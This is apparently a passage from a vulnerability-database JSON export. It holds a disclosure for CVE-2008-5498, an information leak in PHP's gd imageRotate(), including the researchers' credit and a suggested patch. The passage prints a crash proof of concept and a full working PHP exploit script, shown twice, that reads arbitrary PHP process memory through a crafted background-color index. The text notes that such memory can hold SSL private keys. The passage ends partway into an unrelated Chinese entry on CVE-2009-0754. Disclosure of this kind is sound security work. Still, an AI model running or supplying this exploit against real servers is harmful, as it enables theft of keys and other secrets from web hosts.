address.\r\n\r\nProof of concept:\r\nThis script would cause a segmentation faultbecause -9999999 would result in reading an invalid memory address in PHP process:\r\n\r\n<?php\r\n\r\n$img = imagecreate(5,5);\r\n$tmp = imagerotate ($img,5,-9999999);\r\n\r\n?>\r\nExploitation :\r\nWe need to provide a good clrBack to imageRotate()and then calculate the value of desired memory address by using imagecolorat() with arguments concerned with angles of the rotated image. Upper right would be a good spot (0, 0):\r\n\r\n<?php \r\n&special_index = /* index of the$address */\r\n$r=imagecreate(300,300); \r\n$gray = imagecolorallocate( $r,111,111,111); \r\nimagefilledrectangle($r,0,0,300,300,$gray);\r\n$tmp =imagerotate( $r, 30,&special_index ); \r\nimagePng( $tmp, "test.png" ); \r\n?>\r\n\r\n\r\n --------\r\n|f_b/\\\t |\r\n| / \\\t |\r\n| / \\ |\r\n|/image\t\\|\r\n|\\ /|\r\n| \\ / |\r\n| \\ /\t |\r\n| \\/\t |\r\n --------\r\n\r\nTo read encoded memory values from a desired address, we have to use the following script:\r\n\r\n<?php\r\n\r\n$address = /*address to read should bemultiply of 4 */\r\n$src = 0x84cde2c; \r\n// depends on the image size and phpscript length but is constant\r\n$index_b = -(int)(($src - $address +0x810)/4);\r\n\r\n$img = imagecreate(5,5);\r\n$tmp = imagerotate ($img,5,$index_b);\r\n$f_b = imagecolorat( $tmp,0,0);\r\n\r\n?>\r\n\r\nAfter passing $index_b as the index of arrays (red, green, blue and alphaarrays) and rotating $img (so that the values from the memory would be read), b variable takes the value of $address.\r\nThe color at [0,0] would be filled by back color,thus $f_b has the return value of gdTrueColorAlpha function. All we need to do is decoding its value. The final value of $f_b is calculated as following:\r\n$f_b = gdTrueColorAlpha( M[$address-512],\r\n M[$address-255],\r\n M[$address+0],\r\n M[$address+1034]);\r\n\r\nThese offsets [-512, -255, 0, 1034] are the displacements in gdImageStruct's arrays.\r\nDecoding $f_b\r\nAs you can see in the source code $f_b is calculated like this:\r\n----------------------------------------------------------\r\na\t:A4\tA3\tA2\tA1\r\nr\t:\tR4\tR3\tR2\tR1\r\ng\t:\t\tG4\tG3\tG2\tG1\r\nb\t:\t\t\tB4\tB3\tB2\tB1\r\n----------------------------------------------------------\r\n$f_b\t:\t\t\tF4\tF3\tF2\tF1\r\n----------------------------------------------------------\r\n\r\nWe have used a special $index_b in order that b would have the value of memory address at $address. All we need to do is extracting b from $f_b. It is obvious that F1 has the exact value of B1( first byte of memory at $address location). To extract B2 we must have G1 values and use this equation: B2 = F2 \u0096 G1. \r\nTo calculate B3 and B4 we will also need G2, G3, R1, R2, A1. These bytes values can also be grabbed by using imagerotate function and sending special indexes other than $index_b. For more information see the comments in exploit source code.\r\n\r\n\r\n\r\nExploit: \r\n<?php \r\n/* \r\nedi = src \r\nesi = clrBack ( -205923 for core_globals safe mode ( 0x IF APR SM MQS) sample: 0x01 00 SM 00 ) \r\n\r\n( \r\n\tzend_bool magic_quotes_sybase;\t\t\tMQS \r\n\tzend_bool safe_mode;\t\t\t\tSM \r\n\tzend_bool allow_call_time_pass_reference;\t\tAPR \r\n\tzend_bool implicit_flush;\t\t\t\tIF \r\n) \r\n\r\n0x080ed27f <php_gd_gdImageSkewX+1135>: mov 0x10(%edi,%esi,4),%ebx \r\nmov ebx, [edi+esi*4+10] \r\n\r\ntest case: \r\nedi = 0x084c6128 \r\nesi = 0xffee07b1(-1177679) values less than this will crash. \r\n=> \r\nebx = 0x8047ff6 \r\n\r\nif (a>127) { \r\n\ta = 127; \r\n} \r\n:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. \r\n*/ \r\n$debug = 0; \r\n$address = hexdec($argv[1]); \r\n$addressSave = $address; \r\n$count = $argv[3]+1; \r\n$mode = $argv[2]; \r\n$src = 0x84cde2c; \r\n$s = 10; //image size \r\n\r\n$GLOBALS["image"]=imagecreate($s,$s); \r\n$r = $GLOBALS["image"]; \r\nif( $debug ) \r\n\techo "Image created.\\n"; \r\n\r\nfunction getDataFromImage( $index ) { \r\n\t$tmp = imagerotate ($GLOBALS["image"],5,$index); \r\n\treturn imagecolorat( $tmp, 0,0); \r\n} \r\n\r\n$eor = 0; \r\nwhile( $address < $addressSave+$count*4 ) { \r\n\t// indexes \r\n\t$index_b = (int)(($src - $address + 0x810)/4); \r\n\t$index_g = $index_b + 256; \r\n\t$index_r = $index_b + 512; \r\n\t$index_a = $index_b - 1034; \r\n\t//$index_gG is the same as index of r \r\n\t$index_gR = $index_g + 512; \r\n\t//$index_rG is the same as index of gR \r\n\t//$index_gGg is the same as index of gR \r\n\r\n\t// fuctions \r\n\t$f_b = getDataFromImage( -$index_b ); \r\n\t$f_g = getDataFromImage( -$index_g ); \r\n\t$f_r = getDataFromImage( -$index_r ); \r\n\t$f_a = getDataFromImage( -$index_a ); \r\n\t$f_gR = getDataFromImage( -$index_gR ); \r\n\r\n\t/********************* Byte 1 **********************/ \r\n\r\n\t// b byte 1 \r\n\t$byte_b1 = $f_b & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:1-0x%x\\n", $byte_b1 ); \r\n\r\n\t//g byte 1 \r\n\t$byte_g1 = $f_g & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "g:1-0x%x\\n", $byte_g1 ); \r\n\r\n\t//r byte 1 \r\n\t$byte_r1 = $f_r& 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "r:1-0x%x\\n", $byte_r1 ); \r\n\r\n\t//a byte 1 \r\n\t$byte_a1 = $f_a & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "a:1-0x%x\\n\\n", $byte_a1 ); \r\n \r\n\t/* Relative */ \r\n\r\n\t// gG byte 1 \r\n\t// this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. \r\n\t$byte_gG1 = $byte_r1; \r\n\r\n\t// gR byte 1 \r\n\t// this is relative r to `g`( suppose that 'g' is a b) \r\n\t$byte_gR1 = $f_gR & 0x000000ff; \r\n\r\n\t// rG byte 1 \r\n\t// this is relative g to r( suppose that 'r' is a b) \r\n\t$byte_rG1 = $byte_gR1; \r\n\r\n\t/* 2 Level Relative */ \r\n\r\n\t// gGg byte 1 \r\n\t// this is relative g to `gG`( suppose that 'gG' is a b) \r\n\t$byte_gGg1 = $byte_gR1; \r\n\r\n\t/********************* Byte 2 **********************/ \r\n\r\n\t// b byte 2 \r\n\t$sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); \r\n\t$byte_b2 = $sum_b2_g1 - $byte_g1; \r\n\t$borrow_b2 = 0; \r\n\tif( $byte_b2 < 0 ) \r\n\t\t$borrow_b2 = 1; \r\n\t$byte_b2 = $byte_b2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:2-0x%x \\t0x%x\\n", $byte_b2, $f_b ); \r\n\r\n\t// g byte 2 \r\n\t$sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); \r\n\t$byte_g2 = $sum_g2_gG1 - $byte_gG1; \r\n\t$borrow_g2 = 0; \r\n\tif( $byte_g2 < 0 ) \r\n\t\t$borrow_g2 = 1; \r\n\t$byte_g2 = $byte_g2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "g:2-0x%x \\t0x%x\\n", $byte_g2, $f_gG1 ); \r\n\r\n\t// r byte 2 \r\n\t$sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); \r\n\t$byte_r2 = $sum_r2_rG1 - $byte_rG1; \r\n\t$byte_r2 = $byte_r2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "r:2-0x%x \\t0x%x\\n\\n", $byte_r2, $sum_r2_rG1 ); \r\n\r\n\t/* Relative */ \r\n\r\n\t// gG byte 2 \r\n\t$byte_gG2 = $byte_r2; \r\n\r\n\t/********************* Byte 3 **********************/ \r\n\r\n\t// b byte 3 \r\n\t$sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); \r\n\t$sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; \r\n\t$sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; \r\n\t$byte_b3 = $sum_b3_g2 - $byte_g2; \r\n\t$borrow_b3 = 0; \r\n\tif( $byte_b3 < 0 ) \r\n\t{ \r\n\t\t$borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for borrows more than one \r\n\t\tif( $debug ) \r\n\t\t\tprintf( "\\nborrow was: %d\\n" , $borrow_b3 ); \r\n\t} \r\n\t$byte_b3 = $byte_b3 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:3-0x%x \\t0x%x\\n", $byte_b3, $sum_b3_g2 ); \r\n\r\n\t// g byte 3 \r\n\t$sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); \r\n\t$sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; \r\n\t$sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; \r\n\t$byte_g3 = $sum_g3_gG2 - $byte_gG2; \r\n\t$byte_g3 = $byte_g3 & 0x000000ff; \r\n\tif( $debug ) { \r\n\t\tprintf( "f_g: 0x%x\\n" , $f_g); \r\n\t\tprintf( "sum_g3_gG2_gR1_br2: 0x%x\\n" , $sum_g3_gG2_gR1_br2 ); \r\n\t\tprintf( "sum_g3_gG2_gR1: 0x%x\\n" , $sum_g3_gG2_gR1 ); \r\n\t\tprintf( "sum_g3_gG2: 0x%x\\n" , $sum_g3_gG2 ); \r\n\t\tprintf( "g:3-0x%x \\t0x%x\\n\\n", $byte_g3, $sum_b3_g2 ); \r\n\t} \r\n\r\n\t/********************* Byte 4 **********************/ \r\n\r\n\t// b byte 4 \r\n\t$sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); \r\n\t$sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; \r\n\t$sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; \r\n\t$sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; \r\n\t$byte_b4 = $sum_b4_g3 - $byte_g3; \r\n\t$byte_b4 = $byte_b4 & 0x000000ff; \r\n\tif( $debug ) { \r\n\t\tprintf( "f_b: 0x%x\\n" , $f_b); \r\n\t\tprintf( "sum_b4_g3_r2_a1_br3: 0x%x\\n" , $sum_b4_g3_r2_a1_br3 ); \r\n\t\tprintf( "sum_b4_g3_r2_a1: 0x%x\\n" , $sum_b4_g3_r2_a1 ); \r\n\t\tprintf( "sum_b4_g3_r2: 0x%x\\n" , $sum_b4_g3_r2 ); \r\n\t\tprintf( "sum_b4_g3: 0x%x\\n" , $sum_b4_g3 ); \r\n\t\tprintf( "b:4-0x%x\\n\\n", $byte_b4); \r\n\t} \r\n\t/********************* Byte **********************/ \r\n\r\n\tif($mode == 0) { //text mode \r\n\t\tprintf( "%c%c%c%c", $byte_b1, $byte_b2, $byte_b3, $byte_b4); \r\n\t} elseif( $mode == 1) { \r\n\t\t// b \r\n\t\tif( !$eor ) \r\n\t\t\tprintf( "0x%x:\\t", $address ); \r\n\t\tprintf( "0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t", $byte_b1, $byte_b1, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b2, $byte_b2, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b3, $byte_b3, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b4, $byte_b4 ); \r\n\r\n\t\t$eor = !$eor; \r\n\t\tif( !$eor ) \r\n\t\t\techo "\\n"; \r\n\t} else { \r\n\t\t$val = ($byte_b4 << 24) + ($byte_b3 << 16) + ($byte_b2 << 8) + $byte_b1; \r\n\t\tprintf( "0x%x: 0x%x\\n", $address, $val ); \r\n\t} \r\n\t$address+=4; \r\n} \r\n?> \r\n \r\nCredit\r\nThis vulnerability has been discovered by Hamid Ebadi from Amirkabir University of Technology APA laboratory.\r\nautcert@aut.ac.ir\r\nhttps://www.ircert.cc\r\n\r\nDisclosure: October 2008\r\nReport to vendor: December, 10, 2008\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10377"}, {"lastseen": "2017-11-19T16:21:02", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5498"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66122", "id": "SSV:66122", "sourceData": "\n PHP - gd library - imageRotate()function Information Leak Vulnerability\r\n\r\nDiscovered by: Hamid Ebadi, \r\nFurther research and exploit: Mohammad R. Roohian\r\nCSIRT Team Members\r\nAmirkabir University APA Laboratory\r\n\r\nIntroduction\r\nPHP is a popular web programming language which isnormally used as a script engine in the server side.\r\nPHP 5 which is compiledwith gd library, includes a function called imageRotate() for rotating an imageresource by giving the rotation angle.\r\nThis function fills the resulted emptyareas with a given default coloring after rotation (clrBack). \r\nGd library works with both indexed images andtruecolor images. A truecolor pixel is a DWORD which stores the color value ofthe pixel which would be displayed without any change.\r\nIn indexed mode by using an index with a sizeof no more than 1 byte, the data wouldbe fetched from a color palette which consists of parallel arrays of colorbytes. The gd library uses the same data strcture for both of these image types(gdImageStruct).\r\nAn implementation error can cause information leakage from thememory of the PHP (or possible the web server) process.\r\n\r\nInformation leak vulnerabilities allow access to e.g. the Apache memory which might contain the private RSA key for the SSL cert.If an attacker is able to read it he can perform real man in the middle attackson all SSL connections. Aside from this in the days of ASLR, NX and canaryprotections it is often vital for the success of the exploit to know exactmemory addresses. (http://www.php-security.org/)\r\n\r\nVulnerableversion\r\nPHP <= 5.2.8\r\nCVE Candidate Number: CVE-2008-5498\r\n\r\nVulnerability\r\nThe imageRotate() function does not perform any validation check on the clrBack parameter which is used as an index for the above mentioned arrays with the size of 255 in the index image type.\r\nA correct validation check for the indexed images could be:\r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.c\r\n\r\n3129: gdImagePtr gdImageRotate (gdImagePtrsrc, double dAngle,\r\n int clrBack, int ignoretransparent) \r\n3130:{ \r\n3131: gdImagePtrpMidImg; \r\n3132: gdImagePtrrotatedImg;\r\n3133:\r\n3134: if(src == NULL) { \r\n3135: returnNULL; \r\n3136: }\r\n3137:+\r\n3137:+ // Index check\r\n3137:+ if (!src->truecolor) \r\n3137:+ clrBack &= 0xff; // Just keep the first byte\r\n3137:+\r\n3138: if(!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) { \r\n3139: returnNULL; \r\n3140: }\r\n\r\nWhile rotating indexed image, gd retrives the final backcolor from 4 parallel arrays(red, green, blue and alpha) with length of 255 and uses clrBack as the indexof these arrays.\r\nBy providing a special clrBack value (more than 255) we can read almost any address in php memory:\r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.h\r\n\r\ntypedef struct gdImageStruct { \r\n \r\n --snip snip -- \r\n \r\n intred[gdMaxColors]; \r\n intgreen[gdMaxColors]; \r\n intblue[gdMaxColors]; \r\n \r\n --snip snip -- \r\n \r\n intalpha[gdMaxColors]; \r\n /*Truecolor flag and pixels. New 2.0 fields appear here at the \r\n endto minimize breakage of existing object code. */ \r\n inttrueColor; \r\n \r\n --snip snip -- \r\n \r\n} gdImage; \r\n\r\ntypedef gdImage * gdImagePtr; \r\n\r\nthen uses gdTrueColorAlpha macro to combinethe 4 mentioned values. gdTrueColorAlpha macro is implemented as following: \r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.h\r\n\r\n#define gdTrueColorAlpha(r, g, b, a) (((a)<< 24) + \\\r\n ((r)<< 16) + \\\r\n ((g)<< 8) + \\\r\n (b))\r\n\r\nThe final color value is the output of gdTrueColorAlpha macro which will be used as background color. gdTrueColorAlpha uses '+' (add) instead of '&'(and). While the '+' operator is slower, it also causes a security issue. By using a reverse function we can calculate almost any desired memory address.\r\n\r\nProof of concept:\r\nThis script would cause a segmentation faultbecause -9999999 would result in reading an invalid memory address in PHP process:\r\n\r\n<?php\r\n\r\n$img = imagecreate(5,5);\r\n$tmp = imagerotate ($img,5,-9999999);\r\n\r\n?>\r\nExploitation :\r\nWe need to provide a good clrBack to imageRotate()and then calculate the value of desired memory address by using imagecolorat() with arguments concerned with angles of the rotated image. Upper right would be a good spot (0, 0):\r\n\r\n<?php \r\n&special_index = /* index of the$address */\r\n$r=imagecreate(300,300); \r\n$gray = imagecolorallocate( $r,111,111,111); \r\nimagefilledrectangle($r,0,0,300,300,$gray);\r\n$tmp =imagerotate( $r, 30,&special_index ); \r\nimagePng( $tmp, "test.png" ); \r\n?>\r\n\r\n\r\n --------\r\n|f_b/\\\t |\r\n| / \\\t |\r\n| / \\ |\r\n|/image\t\\|\r\n|\\ /|\r\n| \\ / |\r\n| \\ /\t |\r\n| \\/\t |\r\n --------\r\n\r\nTo read encoded memory values from a desired address, we have to use the following script:\r\n\r\n<?php\r\n\r\n$address = /*address to read should bemultiply of 4 */\r\n$src = 0x84cde2c; \r\n// depends on the image size and phpscript length but is constant\r\n$index_b = -(int)(($src - $address +0x810)/4);\r\n\r\n$img = imagecreate(5,5);\r\n$tmp = imagerotate ($img,5,$index_b);\r\n$f_b = imagecolorat( $tmp,0,0);\r\n\r\n?>\r\n\r\nAfter passing $index_b as the index of arrays (red, green, blue and alphaarrays) and rotating $img (so that the values from the memory would be read), b variable takes the value of $address.\r\nThe color at [0,0] would be filled by back color,thus $f_b has the return value of gdTrueColorAlpha function. All we need to do is decoding its value. The final value of $f_b is calculated as following:\r\n$f_b = gdTrueColorAlpha( M[$address-512],\r\n M[$address-255],\r\n M[$address+0],\r\n M[$address+1034]);\r\n\r\nThese offsets [-512, -255, 0, 1034] are the displacements in gdImageStruct's arrays.\r\nDecoding $f_b\r\nAs you can see in the source code $f_b is calculated like this:\r\n----------------------------------------------------------\r\na\t:A4\tA3\tA2\tA1\r\nr\t:\tR4\tR3\tR2\tR1\r\ng\t:\t\tG4\tG3\tG2\tG1\r\nb\t:\t\t\tB4\tB3\tB2\tB1\r\n----------------------------------------------------------\r\n$f_b\t:\t\t\tF4\tF3\tF2\tF1\r\n----------------------------------------------------------\r\n\r\nWe have used a special $index_b in order that b would have the value of memory address at $address. All we need to do is extracting b from $f_b. It is obvious that F1 has the exact value of B1( first byte of memory at $address location). To extract B2 we must have G1 values and use this equation: B2 = F2 \u0096 G1. \r\nTo calculate B3 and B4 we will also need G2, G3, R1, R2, A1. These bytes values can also be grabbed by using imagerotate function and sending special indexes other than $index_b. For more information see the comments in exploit source code.\r\n\r\n\r\n\r\nExploit: \r\n<?php \r\n/* \r\nedi = src \r\nesi = clrBack ( -205923 for core_globals safe mode ( 0x IF APR SM MQS) sample: 0x01 00 SM 00 ) \r\n\r\n( \r\n\tzend_bool magic_quotes_sybase;\t\t\tMQS \r\n\tzend_bool safe_mode;\t\t\t\tSM \r\n\tzend_bool allow_call_time_pass_reference;\t\tAPR \r\n\tzend_bool implicit_flush;\t\t\t\tIF \r\n) \r\n\r\n0x080ed27f <php_gd_gdImageSkewX+1135>: mov 0x10(%edi,%esi,4),%ebx \r\nmov ebx, [edi+esi*4+10] \r\n\r\ntest case: \r\nedi = 0x084c6128 \r\nesi = 0xffee07b1(-1177679) values less than this will crash. \r\n=> \r\nebx = 0x8047ff6 \r\n\r\nif (a>127) { \r\n\ta = 127; \r\n} \r\n:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. \r\n*/ \r\n$debug = 0; \r\n$address = hexdec($argv[1]); \r\n$addressSave = $address; \r\n$count = $argv[3]+1; \r\n$mode = $argv[2]; \r\n$src = 0x84cde2c; \r\n$s = 10; //image size \r\n\r\n$GLOBALS["image"]=imagecreate($s,$s); \r\n$r = $GLOBALS["image"]; \r\nif( $debug ) \r\n\techo "Image created.\\n"; \r\n\r\nfunction getDataFromImage( $index ) { \r\n\t$tmp = imagerotate ($GLOBALS["image"],5,$index); \r\n\treturn imagecolorat( $tmp, 0,0); \r\n} \r\n\r\n$eor = 0; \r\nwhile( $address < $addressSave+$count*4 ) { \r\n\t// indexes \r\n\t$index_b = (int)(($src - $address + 0x810)/4); \r\n\t$index_g = $index_b + 256; \r\n\t$index_r = $index_b + 512; \r\n\t$index_a = $index_b - 1034; \r\n\t//$index_gG is the same as index of r \r\n\t$index_gR = $index_g + 512; \r\n\t//$index_rG is the same as index of gR \r\n\t//$index_gGg is the same as index of gR \r\n\r\n\t// fuctions \r\n\t$f_b = getDataFromImage( -$index_b ); \r\n\t$f_g = getDataFromImage( -$index_g ); \r\n\t$f_r = getDataFromImage( -$index_r ); \r\n\t$f_a = getDataFromImage( -$index_a ); \r\n\t$f_gR = getDataFromImage( -$index_gR ); \r\n\r\n\t/********************* Byte 1 **********************/ \r\n\r\n\t// b byte 1 \r\n\t$byte_b1 = $f_b & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:1-0x%x\\n", $byte_b1 ); \r\n\r\n\t//g byte 1 \r\n\t$byte_g1 = $f_g & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "g:1-0x%x\\n", $byte_g1 ); \r\n\r\n\t//r byte 1 \r\n\t$byte_r1 = $f_r& 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "r:1-0x%x\\n", $byte_r1 ); \r\n\r\n\t//a byte 1 \r\n\t$byte_a1 = $f_a & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "a:1-0x%x\\n\\n", $byte_a1 ); \r\n \r\n\t/* Relative */ \r\n\r\n\t// gG byte 1 \r\n\t// this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. \r\n\t$byte_gG1 = $byte_r1; \r\n\r\n\t// gR byte 1 \r\n\t// this is relative r to `g`( suppose that 'g' is a b) \r\n\t$byte_gR1 = $f_gR & 0x000000ff; \r\n\r\n\t// rG byte 1 \r\n\t// this is relative g to r( suppose that 'r' is a b) \r\n\t$byte_rG1 = $byte_gR1; \r\n\r\n\t/* 2 Level Relative */ \r\n\r\n\t// gGg byte 1 \r\n\t// this is relative g to `gG`( suppose that 'gG' is a b) \r\n\t$byte_gGg1 = $byte_gR1; \r\n\r\n\t/********************* Byte 2 **********************/ \r\n\r\n\t// b byte 2 \r\n\t$sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); \r\n\t$byte_b2 = $sum_b2_g1 - $byte_g1; \r\n\t$borrow_b2 = 0; \r\n\tif( $byte_b2 < 0 ) \r\n\t\t$borrow_b2 = 1; \r\n\t$byte_b2 = $byte_b2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:2-0x%x \\t0x%x\\n", $byte_b2, $f_b ); \r\n\r\n\t// g byte 2 \r\n\t$sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); \r\n\t$byte_g2 = $sum_g2_gG1 - $byte_gG1; \r\n\t$borrow_g2 = 0; \r\n\tif( $byte_g2 < 0 ) \r\n\t\t$borrow_g2 = 1; \r\n\t$byte_g2 = $byte_g2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "g:2-0x%x \\t0x%x\\n", $byte_g2, $f_gG1 ); \r\n\r\n\t// r byte 2 \r\n\t$sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); \r\n\t$byte_r2 = $sum_r2_rG1 - $byte_rG1; \r\n\t$byte_r2 = $byte_r2 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "r:2-0x%x \\t0x%x\\n\\n", $byte_r2, $sum_r2_rG1 ); \r\n\r\n\t/* Relative */ \r\n\r\n\t// gG byte 2 \r\n\t$byte_gG2 = $byte_r2; \r\n\r\n\t/********************* Byte 3 **********************/ \r\n\r\n\t// b byte 3 \r\n\t$sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); \r\n\t$sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; \r\n\t$sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; \r\n\t$byte_b3 = $sum_b3_g2 - $byte_g2; \r\n\t$borrow_b3 = 0; \r\n\tif( $byte_b3 < 0 ) \r\n\t{ \r\n\t\t$borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for borrows more than one \r\n\t\tif( $debug ) \r\n\t\t\tprintf( "\\nborrow was: %d\\n" , $borrow_b3 ); \r\n\t} \r\n\t$byte_b3 = $byte_b3 & 0x000000ff; \r\n\tif( $debug ) \r\n\t\tprintf( "b:3-0x%x \\t0x%x\\n", $byte_b3, $sum_b3_g2 ); \r\n\r\n\t// g byte 3 \r\n\t$sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); \r\n\t$sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; \r\n\t$sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; \r\n\t$byte_g3 = $sum_g3_gG2 - $byte_gG2; \r\n\t$byte_g3 = $byte_g3 & 0x000000ff; \r\n\tif( $debug ) { \r\n\t\tprintf( "f_g: 0x%x\\n" , $f_g); \r\n\t\tprintf( "sum_g3_gG2_gR1_br2: 0x%x\\n" , $sum_g3_gG2_gR1_br2 ); \r\n\t\tprintf( "sum_g3_gG2_gR1: 0x%x\\n" , $sum_g3_gG2_gR1 ); \r\n\t\tprintf( "sum_g3_gG2: 0x%x\\n" , $sum_g3_gG2 ); \r\n\t\tprintf( "g:3-0x%x \\t0x%x\\n\\n", $byte_g3, $sum_b3_g2 ); \r\n\t} \r\n\r\n\t/********************* Byte 4 **********************/ \r\n\r\n\t// b byte 4 \r\n\t$sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); \r\n\t$sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; \r\n\t$sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; \r\n\t$sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; \r\n\t$byte_b4 = $sum_b4_g3 - $byte_g3; \r\n\t$byte_b4 = $byte_b4 & 0x000000ff; \r\n\tif( $debug ) { \r\n\t\tprintf( "f_b: 0x%x\\n" , $f_b); \r\n\t\tprintf( "sum_b4_g3_r2_a1_br3: 0x%x\\n" , $sum_b4_g3_r2_a1_br3 ); \r\n\t\tprintf( "sum_b4_g3_r2_a1: 0x%x\\n" , $sum_b4_g3_r2_a1 ); \r\n\t\tprintf( "sum_b4_g3_r2: 0x%x\\n" , $sum_b4_g3_r2 ); \r\n\t\tprintf( "sum_b4_g3: 0x%x\\n" , $sum_b4_g3 ); \r\n\t\tprintf( "b:4-0x%x\\n\\n", $byte_b4); \r\n\t} \r\n\t/********************* Byte **********************/ \r\n\r\n\tif($mode == 0) { //text mode \r\n\t\tprintf( "%c%c%c%c", $byte_b1, $byte_b2, $byte_b3, $byte_b4); \r\n\t} elseif( $mode == 1) { \r\n\t\t// b \r\n\t\tif( !$eor ) \r\n\t\t\tprintf( "0x%x:\\t", $address ); \r\n\t\tprintf( "0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t", $byte_b1, $byte_b1, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b2, $byte_b2, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b3, $byte_b3, \r\n\t\t\t\t\t\t\t\t\t\t $byte_b4, $byte_b4 ); \r\n\r\n\t\t$eor = !$eor; \r\n\t\tif( !$eor ) \r\n\t\t\techo "\\n"; \r\n\t} else { \r\n\t\t$val = ($byte_b4 << 24) + ($byte_b3 << 16) + ($byte_b2 << 8) + $byte_b1; \r\n\t\tprintf( "0x%x: 0x%x\\n", $address, $val ); \r\n\t} \r\n\t$address+=4; \r\n} \r\n?> \r\n \r\nCredit\r\nThis vulnerability has been discovered by Hamid Ebadi from Amirkabir University of Technology APA laboratory.\r\nautcert@aut.ac.ir\r\nhttps://www.ircert.cc\r\n\r\nDisclosure: October 2008\r\nReport to vendor: December, 10, 2008\r\n\r\n# milw0rm.com [2009-01-02]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66122"}, {"lastseen": "2017-11-19T18:16:43", "description": "BUGTRAQ ID: 33542\r\nCVE ID: CVE-2009-0754\r\n\r\nPHP\u662f\u5e7f\u6cdb\u4f7f\u7528\u7684\u901a\u7528\u76ee\u7684\u811a\u672c\u8bed\u8a00\uff0c\u7279\u522b\u9002\u5408\u4e8eWeb\u5f00\u53d1\uff0c\u53ef\u5d4c\u5165\u5230HTML\u4e2d\u3002 \r\n\r\n\u8fd0\u884c\u5728Apache\u4e0a\u7684PHP\u5141\u8bb8\u672c\u5730\u7528\u6237\u901a\u8fc7\u4fee\u6539.htaccess\u4e2d\u7684mbstring.func_overload\u8bbe\u7f6e\u6765\u4fee\u6539\u540c\u4e00Web\u670d\u52a1\u5668\u4e0a\u6240\u627f\u8f7d\u7684\u5176\u4ed6\u7ad9\u70b9\u7684\u884c\u4e3a\uff0c\u5c06\u8bbe\u7f6e\u5e94\u7528\u5230\u540c\u4e00\u670d\u52a1\u5668\u7684\u5176\u4ed6\u865a\u62df\u4e3b\u673a\uff0c\u5bfc\u81f4\u65e0\u6cd5\u6b63\u786e\u7684\u5904\u7406\u591a\u5b57\u8282\u5b57\u7b26\u4e32\u3002\n\nPHP PHP 5.1.6\r\nPHP PHP 